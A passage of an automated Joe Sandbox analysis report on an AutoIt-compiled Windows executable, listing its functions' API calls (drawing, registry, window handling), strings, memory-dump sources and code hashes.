                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 00430933
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                                                                                                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                                                                                                                                                                                                                                                                                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00430AE9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseConnectCreateRegistry
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3217815495-966354055
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 632589d2a76c64a0923bcd1a4645069594953deaaca638e9f2e4c640ba1a6a29
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 632589d2a76c64a0923bcd1a4645069594953deaaca638e9f2e4c640ba1a6a29
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00456746
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                                                                                                                                                                                                                                                                                                                                                • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 225202481-3320066284
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00454E8D Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 213windowlibraryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EB0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EC3
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454ED0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454EE4
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454EF1
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00454F05
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00454F12
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454F48
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032), ref: 00454F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,00000001,?,?), ref: 00454F9B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00454FE5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,00000001,?,?), ref: 00455016
                                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?), ref: 00455023
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0045507D
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?), ref: 0045508B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004550A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004550B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 004550D9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2511167534-1154884017
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b375f9f1c060e8dc6bc6b77497d5ee60ef8e4d255dc939bc4899f3b4511c0762
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 15f67b2365a9f585a2e114aae537e2d642ac99032f03718e2682cba1ccb7e1e2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b375f9f1c060e8dc6bc6b77497d5ee60ef8e4d255dc939bc4899f3b4511c0762
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C71B571500704BAEB10DF64DD95BFF73A8AF44B06F00881EFE45D6182E7B9A988C769
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @$AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 867697134-3359773793
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicoll$__wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 790654849-32604322
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
